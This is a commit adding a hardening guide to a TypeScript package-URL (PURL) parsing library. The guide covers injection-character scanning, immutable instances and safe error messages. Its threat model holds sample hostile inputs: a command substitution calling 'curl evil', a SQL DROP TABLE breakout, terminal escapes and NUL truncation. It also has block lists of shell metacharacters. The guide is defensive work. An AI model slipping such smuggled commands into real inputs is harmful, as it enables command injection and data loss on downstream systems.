Commit 5d613e1

docs(hardening): add strong-stance doc on injection + freeze + error shape
Renamed from "safety" to "hardening" — term of art in security engineering, pairs with the existing gerund filenames (building, parsing). Covers the library's protective posture toward PURL strings as hostile input: isInjectionCharCode (C0/shell/C1/unicode classes), recursiveFreeze with LOOP_SENTINEL cap, charLabel-only error messages, the six-entry threat model, red flags for reviewers, and an explicit "what this library does NOT defend against" section so callers understand where the boundary is. Junior-dev level: every section has a why, not just a what. Reviewer checklist for new ecosystem handlers makes the doctrine enforceable in PR review.
1 parent 60ccd28 commit 5d613e1

2 files changed

Lines changed: 257 additions & 0 deletions

docs/hardening.md

Lines changed: 251 additions & 0 deletions
@@ -0,0 +1,251 @@
# Hardening

How this library treats PURL strings as hostile input and refuses to
hand downstream consumers something that can hurt them. Read this
if you are touching `src/strings.ts`, `src/objects.ts`, `src/error.ts`,
or reviewing a PR that adds a new ecosystem handler.

## Who this is for

Contributors adding or reviewing code paths that read PURL input
from the outside (user text, CLI args, API payloads, file contents).
The rules here keep the library from being a confused deputy for a
caller with hostile intent.

## The stance

**Valid PURLs never throw. Hostile input never parses.**

That is the whole doctrine. Everything below is mechanics that turn
it into code.

A well-formed PURL (one that matches the spec shape and contains no
dangerous characters) builds a frozen `PackageURL` instance the
caller can rely on. An ill-formed PURL throws a `PurlError`. An input
that looks like it wants to be interpreted twice (once as a PURL, and
again by a downstream consumer such as a shell, SQL engine, URL
parser, or log pipeline) throws a `PurlInjectionError` **before
parse**. The caller never sees a half-interpreted object.

## The threat model

We assume the attacker controls the PURL string. They may try to:

1. **Inject shell metacharacters** so a downstream caller that
   interpolates the PURL into a command executes something the
   caller didn't intend. Example:
   `pkg:npm/$(curl evil)/x@1`.
2. **Break out of a quoted context** so the PURL is split into
   extra argv entries or terminates a SQL string literal early.
   Example: `pkg:npm/a";DROP TABLE pkgs;--/x@1`.
3. **Desync terminal / log parsers** with control characters, so a
   log-review tool renders attacker-controlled bytes as if they
   were tool output. Example: `pkg:npm/a\x1b[2Jb/x@1`.
4. **Smuggle invisible characters** (zero-width spaces,
   right-to-left overrides, BOM) so the rendered name looks like
   one package but resolves to another. Example:
   `pkg:npm/react\u200bact@1`, where `\u200b` is a zero-width space.
5. **Truncate** with NUL, so a PURL that looks harmless to a JS
   string parser gets half-read by a C library. Example:
   `pkg:npm/safe\x00evil@1`.
6. **Mutate a PackageURL** after it has been built, so a consumer
   downstream sees a different name than the one that was validated
   upstream.

The rest of this doc describes how the library refuses all six.

## The first line: injection-character detection

`src/strings.ts` exports `isInjectionCharCode(code: number)`. It
returns `true` for any character code in one of four classes:

| Class | Codes | Why |
|---|---|---|
| **C0 control characters** | `0x00`–`0x1f` | NUL (truncation), TAB / LF / CR (log injection), ESC (terminal escape), everything else in that range |
| **Shell metacharacters + brackets + quotes** | `0x20` (space), `!`, `"`, `#`, `$`, `%`, `&`, `'`, `(`, `)`, `*`, `;`, `<`, `=`, `>`, `?`, `[`, `\`, `]`, `` ` ``, `{`, `\|`, `}`, `~`, DEL (`0x7f`) | Shell interpretation, SQL quote-escape, URL-fragment injection |
| **C1 control characters** | `0x80`–`0x9f` | Legacy control bytes; some terminals still act on them |
| **Unicode invisible/directional** | `U+200B`–`U+200F`, `U+202A`–`U+202E`, `U+2060`, `U+FEFF`, `U+FFFC`, `U+FFFD` | Zero-width chars, bidi override characters (IDN-homograph attacks), BOM, object replacement and replacement characters |

Any input containing one of these characters in a component where
we scan for injection throws `PurlInjectionError` before the
standard parse logic runs. The error names:

- Which **purl type** the component belongs to (`npm`, `maven`, …)
- Which **component** failed (`name`, `namespace`, …)
- The **char code** and a human-readable label

```typescript
class PurlInjectionError extends PurlError {
  readonly charCode: number   // code of the offending character
  readonly component: string  // e.g. 'name', 'namespace'
  readonly purlType: string   // e.g. 'npm', 'maven'
}
```
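
The four classes in the table can be sketched as a single predicate. This is a re-derivation from the table for illustration, not the library's source; the names `isInjectionCharCodeSketch` and `findInjectionIndexSketch` are hypothetical, and the sketch scans UTF-16 code units.

```typescript
// Sketch only: rebuilt from the table above, not copied from src/strings.ts.

// ASCII punctuation flagged by the broad scanner (space and DEL are checked by code).
const BROAD_ASCII_PUNCTUATION = '!"#$%&\'()*;<=>?[\\]`{|}~'

function isInjectionCharCodeSketch(code: number): boolean {
  if (code >= 0x00 && code <= 0x1f) return true        // C0 controls
  if (code === 0x20 || code === 0x7f) return true      // space, DEL
  if (code >= 0x80 && code <= 0x9f) return true        // C1 controls
  if (code >= 0x200b && code <= 0x200f) return true    // zero-width chars, directional marks
  if (code >= 0x202a && code <= 0x202e) return true    // bidi embeddings and overrides
  if (code === 0x2060 || code === 0xfeff) return true  // word joiner, BOM
  if (code === 0xfffc || code === 0xfffd) return true  // object replacement, replacement char
  return code < 0x80 && BROAD_ASCII_PUNCTUATION.indexOf(String.fromCharCode(code)) !== -1
}

// Hypothetical helper: index of the first flagged code unit, or -1 if clean.
function findInjectionIndexSketch(component: string): number {
  for (let i = 0; i < component.length; i += 1) {
    if (isInjectionCharCodeSketch(component.charCodeAt(i))) return i
  }
  return -1
}
```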

Callers who want to treat injection attempts as auditable events
(log, alert, rate-limit the source) can `catch` specifically for
`PurlInjectionError` and route those up while still handling
`PurlError` as "just a malformed PURL."
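
A minimal sketch of that routing follows. The two classes are stand-ins that mirror the shapes described above so the example is self-contained; real code would import the library's own classes. `classifyParseSketch` and `ParseOutcomeSketch` are hypothetical names.

```typescript
// Stand-in classes for illustration; not the library's implementations.
class PurlErrorSketch extends Error {
  constructor(message: string) {
    super(message)
    // Keeps `instanceof` reliable even when compiled down to ES5.
    Object.setPrototypeOf(this, new.target.prototype)
  }
}

class PurlInjectionErrorSketch extends PurlErrorSketch {
  readonly charCode: number
  readonly component: string
  readonly purlType: string
  constructor(purlType: string, component: string, charCode: number) {
    super(`Invalid purl: ${purlType} ${component} contains injection character code ${charCode}`)
    this.purlType = purlType
    this.component = component
    this.charCode = charCode
  }
}

type ParseOutcomeSketch =
  | { kind: 'ok' }
  | { kind: 'malformed'; message: string }
  | { kind: 'injection'; purlType: string; component: string; charCode: number }

// `parse` is whatever parsing call the caller already uses.
function classifyParseSketch(parse: () => void): ParseOutcomeSketch {
  try {
    parse()
    return { kind: 'ok' }
  } catch (e) {
    // Check the subclass first: it is also an instance of the base class.
    if (e instanceof PurlInjectionErrorSketch) {
      return { kind: 'injection', purlType: e.purlType, component: e.component, charCode: e.charCode }
    }
    if (e instanceof PurlErrorSketch) {
      return { kind: 'malformed', message: e.message }
    }
    throw e // not a PURL problem, so let it propagate
  }
}
```

An `injection` outcome is the one to log or alert on; a `malformed` outcome can be reported back to the user as an ordinary validation failure.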

## The narrower scanner for freer contexts

Some PURL components (like version strings or URL-based qualifier
values) are legitimately allowed to carry characters that are
dangerous elsewhere: a URL qualifier value may contain `?`, `&`,
`=`, `:`, `/` as part of a normal URL. For those contexts
`src/strings.ts` exports a narrower scanner that only blocks the
characters that actually enable shell execution or code injection:
the control characters, the shell metacharacters (`|`, `&`, `;`,
`` ` ``, `$`, `<`, `>`, `(`, `)`, `{`, `}`, `\`), and quotes.

The choice between the broad and narrow scanner is the difference
between "this component should be a plain identifier" (use the
broad scanner; anything non-identifier is suspicious) and "this
component is a URL-shaped value" (use the narrow scanner; pass
through URL syntax).
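
The narrower check can be sketched the same way. The source does not name this scanner, so `isCommandExecutionCharCodeSketch` is a hypothetical name, and treating "the control characters" as C0, DEL, and C1 is an assumption. The blocked set is taken literally from the list above, which includes `&`, so this sketch rejects a query string that joins parameters with `&`.

```typescript
// Sketch only: the blocked set is copied from the prose above, not from src/strings.ts.
// Shell metacharacters plus double and single quotes.
const NARROW_BLOCKED_CHARS = '|&;`$<>(){}\\"\''

function isCommandExecutionCharCodeSketch(code: number): boolean {
  if (code >= 0x00 && code <= 0x1f) return true  // C0 controls (assumed in scope)
  if (code === 0x7f) return true                 // DEL (assumed in scope)
  if (code >= 0x80 && code <= 0x9f) return true  // C1 controls (assumed in scope)
  return code < 0x80 && NARROW_BLOCKED_CHARS.indexOf(String.fromCharCode(code)) !== -1
}

// Hypothetical helper for URL-shaped values such as a repository URL qualifier.
function hasCommandExecutionCharSketch(value: string): boolean {
  for (let i = 0; i < value.length; i += 1) {
    if (isCommandExecutionCharCodeSketch(value.charCodeAt(i))) return true
  }
  return false
}
```

URL punctuation such as `?`, `=`, `:`, and `/` passes through, while anything that could start a subshell or close a quote is still rejected.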

## The second line: immutable instances

`src/objects.ts` exports `recursiveFreeze(value)`. Every
`PackageURL` instance runs through it at construction time:

- Top-level instance is `Object.freeze`-d.
- Qualifiers object is frozen.
- Any nested objects or arrays reachable from the instance are
  frozen.

That means a `PackageURL` you receive from a library call cannot be
mutated by a later code path:

```typescript
// Qualifiers are passed so there is a nested object to try to mutate.
const purl = new PackageURL('npm', undefined, 'safe-pkg', '1.0.0', { arch: 'x64' })
// Both writes are rejected: silently ignored in sloppy mode, TypeError in
// strict mode (which includes ES modules and class bodies).
purl.name = 'evil-pkg'
purl.qualifiers.key = 'hax'
```

This matters when a validated PURL is passed through three or more
hops: a middle hop can't secretly modify the object and hand it to
the next hop. Validation up front + freeze means "validated" still
means something at the endpoint.

The freeze walk is **breadth-first** with a `WeakSet` for cycle
detection and a hard ceiling at one million nodes
(`LOOP_SENTINEL`). An adversary-constructed cyclic object cannot
loop the walker forever; a million-node object graph throws
`Error("Object graph too large…")` rather than OOM-ing the
process.
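
A breadth-first freeze with those two guards might look like the sketch below. It is written from the description above, not taken from `src/objects.ts`; `recursiveFreezeSketch`, `LOOP_SENTINEL_SKETCH`, and the exact error text are stand-ins, and following only data properties (not accessors) is an assumption.

```typescript
// Sketch only. The cap value comes from the text above; the real error
// message is elided there, so this one is a stand-in.
const LOOP_SENTINEL_SKETCH = 1000000

function isWalkableSketch(value: unknown): value is object {
  return typeof value === 'object' && value !== null
}

function recursiveFreezeSketch<T>(root: T, maxNodes: number = LOOP_SENTINEL_SKETCH): T {
  if (!isWalkableSketch(root)) return root // primitives need no freezing
  const seen = new WeakSet<object>()       // cycle detection
  const queue: object[] = [root]           // FIFO queue gives breadth-first order
  seen.add(root)
  for (let head = 0; head < queue.length; head += 1) {
    const current = queue[head] as object
    Object.freeze(current)
    for (const key of Object.getOwnPropertyNames(current)) {
      // Read through the descriptor so accessor properties are never invoked.
      const descriptor = Object.getOwnPropertyDescriptor(current, key)
      const child: unknown = descriptor ? descriptor.value : undefined
      if (!isWalkableSketch(child) || seen.has(child)) continue
      // Enforce the cap before enqueueing so the queue itself stays bounded.
      if (queue.length >= maxNodes) throw new Error('Object graph too large')
      seen.add(child)
      queue.push(child)
    }
  }
  return root
}
```

Checking the cap at enqueue time rather than at dequeue time means a single node with millions of children fails before the queue grows to hold them.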

## The third line: error messages that don't leak

`src/error.ts`'s `formatPurlErrorMessage` normalizes every
user-visible error message:

- Lowercase the first letter (`Invalid → invalid`)
- Strip a trailing period
- Prefix with `Invalid purl:`

The normalization matters because error strings land in logs,
support tickets, and sometimes in HTTP responses. A consistent
shape:

- Is grep-able (every one starts with `Invalid purl:`).
- Never renders attacker-controlled bytes verbatim when injection is
  detected. The `PurlInjectionError` message carries *the char label*
  (e.g. "SPACE", "NUL", "BACKTICK"), not the raw character, so a
  terminal displaying the log never interprets an ESC sequence the
  attacker embedded.
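
The three normalization steps and the label-only rule can be sketched as follows. Both functions are illustrative stand-ins, not the code in `src/error.ts`: the labels `NUL`, `SPACE`, and `BACKTICK` come from the text above, while `ESC` and the `U+XXXX` fallback are assumptions.

```typescript
// Sketch only: hypothetical label table and formatter.
const CHAR_LABELS_SKETCH: { [code: number]: string } = {
  0x00: 'NUL',
  0x1b: 'ESC', // assumed label, not named in the source
  0x20: 'SPACE',
  0x60: 'BACKTICK',
}

function charLabelSketch(code: number): string {
  const known = CHAR_LABELS_SKETCH[code]
  if (known !== undefined) return known
  // Fall back to a hex code point so the raw character never reaches the message.
  const hex = code.toString(16).toUpperCase()
  return 'U+' + ('0000' + hex).slice(-Math.max(4, hex.length))
}

function formatPurlErrorMessageSketch(message: string): string {
  let body = message
  // 1. Lowercase the first letter.
  if (body.length > 0) body = body.charAt(0).toLowerCase() + body.slice(1)
  // 2. Strip a trailing period.
  if (body.charAt(body.length - 1) === '.') body = body.slice(0, -1)
  // 3. Prefix with the grep-able marker.
  return 'Invalid purl: ' + body
}
```

Building the injection message from `charLabelSketch(0x1b)` yields the text `ESC` rather than the escape byte itself, which is what keeps a log viewer from acting on it.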

## When to call what

| Situation | Use |
|---|---|
| Parsing a full PURL string from untrusted input | `PackageURL.fromString(str)`; throws `PurlInjectionError` or `PurlError`, so wrap it in `try`/`catch` |
| Validating a user-submitted PURL in a form | `PackageURL.fromStringResult(str)`; returns a `Result`, so failures can be collected instead of thrown |
| Building a PURL from already-trusted pieces (internal codepaths) | `new PackageURL(type, ns, name, version, qualifiers, subpath)`; still runs validation, but you know the inputs are clean |
| Comparing two PURLs | `purl.equals(other)` / `purl.matches(pattern)`; both ReDoS-safe |

For converter utilities (URL → PURL, PURL → URL) see
`docs/converters.md`; for the builder API see `docs/builders.md`.

## Red flags when reviewing a PR

If a PR touches PURL-component handling, pause if you see any of:

1. **Bypassing the injection scan.** A rule like "skip
   `isInjectionCharCode` for this type because the user won't ever
   put weird characters there" is exactly the kind of assumption
   that gets a library blamed for the next CVE. If the scan is
   expensive in a hot path, optimize the scan; never skip it.
2. **Unfreezing.** `Object.freeze` takes no options and a frozen
   object cannot be thawed, so in practice this shows up as skipping
   `recursiveFreeze` or cloning into a mutable shape. Cloning is
   fine only when a new instance is being built from scratch. If
   you see code that hands back a mutable copy, call it out.
3. **Raw char interpolation in error messages.** Every
   `PurlInjectionError` is built from `charLabel`, not the raw
   character. If a new error message string-interpolates a
   suspect char directly, that message will render the char
   verbatim in someone's terminal later.
4. **Removing the `LOOP_SENTINEL` cap** on `recursiveFreeze` or
   bumping it to `Infinity`. The ceiling is the last line between a
   hostile, oversized object graph and process-wide OOM.
5. **Catching and swallowing `PurlInjectionError` silently.**
   Injection attempts are a signal, not noise. They deserve to
   propagate to the caller who can choose to log/alert/block.
6. **New ecosystem handler that doesn't use `PurlComponent`'s
   shared normalize/validate.** Every ecosystem inherits the
   injection scan via the shared components. An ad-hoc parser
   inside `src/purl-types/<x>.ts` bypasses that by default.

## What this library does **not** defend against

Be honest about scope:

- **Resource exhaustion.** A very long valid PURL will still be
  processed. We do not impose a max string length. Callers who
  accept PURLs from the wire should rate-limit and size-limit at
  the boundary.
- **Regex catastrophic backtracking in patterns you pass to us.**
  The library's own internal regexes are ReDoS-free (simple char
  scans), but if you pass a user-controlled pattern to
  `purl.matches(userPattern)`, validate that pattern yourself.
- **Typosquatting / ecosystem-level package confusion.** That is a
  policy problem at the package-registry layer (Socket's main
  product, in fact), not a string-level check this library can
  make.
- **Crafted URLs in URL-converter inputs.** `urlConverter.fromUrl`
  trusts its input is a real URL string. Pass untrusted URLs
  through `new URL()` first.

If the caller's use case hits one of these, document it at the
boundary; don't try to push it into the library.
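
Two of these boundary checks are small enough to sketch. Both helpers are hypothetical caller-side code, not part of the library, and the 2048-character limit is an arbitrary illustrative value. The only external API used is the standard `URL` constructor, which throws on input it cannot parse.

```typescript
// Sketch only: caller-side guards that run before anything reaches the library.
const MAX_PURL_LENGTH_SKETCH = 2048 // arbitrary example limit, not a library constant

// Size-limit at the boundary: reject oversized input before parsing it.
function checkPurlSizeSketch(input: string, maxLength: number = MAX_PURL_LENGTH_SKETCH): string {
  if (input.length > maxLength) {
    throw new RangeError('PURL input exceeds ' + maxLength + ' characters')
  }
  return input
}

// Pre-validate an untrusted URL: returns the parsed URL, or null if it is not one.
function parseUrlOrNullSketch(candidate: string): URL | null {
  try {
    return new URL(candidate)
  } catch {
    return null
  }
}
```

A caller would pass only the strings that survive these guards on to the parser or to the URL converter.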

## Checklist for adding a new ecosystem handler

- [ ] Handler file at `src/purl-types/<name>.ts`.
- [ ] `normalize`, `validate` rules use the shared `PurlComponent`
  helpers, with no ad-hoc parsing.
- [ ] Any custom check calls `isInjectionCharCode` (or the narrower
  command-execution scanner) before other logic.
- [ ] Tests include at least one case per injection class (shell
  char, control char, unicode invisible), each expecting
  `PurlInjectionError`.
- [ ] No mutation of the PURL instance after construction.
- [ ] No catch-and-swallow of `PurlInjectionError`.
- [ ] Error messages use `charLabel`, never raw chars.
- [ ] Registered in `src/purl-type.ts`'s `knownTypes` map.
- [ ] `pnpm test` green, `pnpm cover` still at 100%.

## Further reading

- [`docs/architecture.md`](./architecture.md): where these modules
  fit in the larger design.
- [`docs/api.md`](./api.md): the full public API reference.
- [`docs/vers.md`](./vers.md): version-range specifiers; also
  hostile-input territory.
- [`src/strings.ts`](../src/strings.ts): `isInjectionCharCode` +
  narrower scanners.
- [`src/objects.ts`](../src/objects.ts): `recursiveFreeze` +
  `LOOP_SENTINEL`.
- [`src/error.ts`](../src/error.ts): `PurlError` +
  `PurlInjectionError` + `formatPurlErrorMessage`.
- [package-url/purl-spec](https://github.com/package-url/purl-spec):
  the upstream spec this library implements.

tour.json

Lines changed: 6 additions & 0 deletions
@@ -173,6 +173,12 @@
       "source": "docs/architecture.md",
       "summary": "Module map, data flow, and the key abstractions that keep the library small."
     },
+    {
+      "filename": "hardening",
+      "title": "Hardening",
+      "source": "docs/hardening.md",
+      "summary": "How the library treats PURL strings as hostile input — injection-character detection, frozen instances, and a strong protective stance."
+    },
     {
       "filename": "tour",
       "title": "Tour",
